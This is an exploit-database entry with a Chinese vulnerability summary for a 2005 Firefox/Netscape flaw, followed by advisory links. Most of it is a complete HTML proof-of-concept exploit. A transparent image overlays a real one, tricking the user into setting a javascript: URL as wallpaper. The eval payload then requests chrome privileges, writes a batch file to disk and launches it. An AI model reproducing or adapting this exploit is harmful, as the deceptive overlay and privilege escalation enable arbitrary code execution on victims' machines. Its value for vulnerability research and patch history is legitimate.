https://www.exploit-db.com/exploits/1102
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-155

firefox及Netscape均为Web浏览器软件。Firefox1.0.3、1.0.4版本及Netscape8.0.2版本存在代码执行漏洞。远程攻击者可诱使用户在浏览器中将一个图片设置为桌面背景，而实际上该图片的URL是一个包含eval语句的jacascript:URL。

// Exploit by Michael Krax
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Firewalling - Proof-of-Concept</title>
<script>
function stopload() {
// in some cases the javascript url never stops to load
// therefore we force a stop after the real image got loaded
window.setTimeout("window.stop()",1000);
}
</script>
</head>
<body>
<div style="font-family:Verdana;font-size:11px;">

<div style="font-family:Verdana;font-size:15px;font-weight:bold;">
Firewalling - Proof-of-Concept</div>
<div style="width:600px">
The "Set As Wallpaper" dialog takes the image url as a parameter without validating it.
This allows to execute javascript in chrome and to run arbitrary code.
<br><br>
By using absolute positioning and the moz-opacity filter an attacker can easily fool the
user to think he is setting a valid image as wallpaper.
<br><br>
Right click on the image and choose "Set As Wallpaper". The demo requests
UniversalXPConnect rights, creates c:booom.bat and launches the batch file
that shows a directoy listing in a dos box (Windows only).
<br><br>

<div style="position:relative; width:300px; height:250px;">
<img src="javascript:/*-----------------------------*/eval('if(document.location.href.
substr(0,6)=='chrome'){netscape.security.PrivilegeManager.enablePrivilege('
UniversalXPConnect');file=Components.classes['@mozilla.org/file/local;1'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\
booom.bat');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,
420);outputStream=Components.classes['@mozilla.org/network/file-output-stream;
1'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init
(file,0x04|0x08|0x20,420,0);output='@ECHO OFF\n:BEGIN\nCLS\nDIR\nPAUSE
\n:END';outputStream.write(output,output.length);outputStream.close();file.launch
();}else{void(0)}')" width="300" height="250"  border="0" style="position:
absolute; left:0px; top:0px; z-index:2; -moz-opacity:0;">
<img src="http://www.milw0rm.com/images/logo.png" width="300" height="250"  border="0" style="position:
absolute; left:0px; top:0px; z-index:1;" onload="stopload()">
</div>
</div>
</body>

</html>

# milw0rm.com [2005-07-13]

来源:www.mozilla.org
链接:http://www.mozilla.org/security/announce/mfsa2005-47.html
来源:MISC
链接:http://www.mikx.de/firewalling/
来源:BID
名称:14242
链接:http://www.securityfocus.com/bid/14242
来源:MISC
链接:http://www.securiteam.com/securitynews/5ZP0E0UGAK.html
来源:REDHAT
名称:RHSA-2005:586
链接:http://www.redhat.com/support/errata/RHSA-2005-586.html
来源:SUSE
名称:SUSE-SA:2005:045
链接:http://www.novell.com/linux/security/advisories/2005_45_mozilla.html
来源:SUSE
名称:SUSE-SR:2005:018
链接:http://www.novell.com/linux/security/advisories/2005_18_sr.html
来源:MISC
链接:http://www.networksecurity.fi/advisories/netscape-multiple-issues.html
来源:VUPEN
名称:ADV-2005-1075
链接:http://www.frsirt.com/english/advisories/2005/1075
来源:CIAC
名称:P-252
链接:http://www.ciac.org/ciac/bulletins/p-252.shtml
来源:SECUNIA
名称:16044
链接:http://secunia.com/advisories/16044
来源:SECUNIA
名称:16043
链接:http://secunia.com/advisories/16043
来源:USGovernmentResource:oval:org.mitre.oval:def:100011
名称:oval:org.mitre.oval:def:100011
链接:http://oval.mitre.org/repository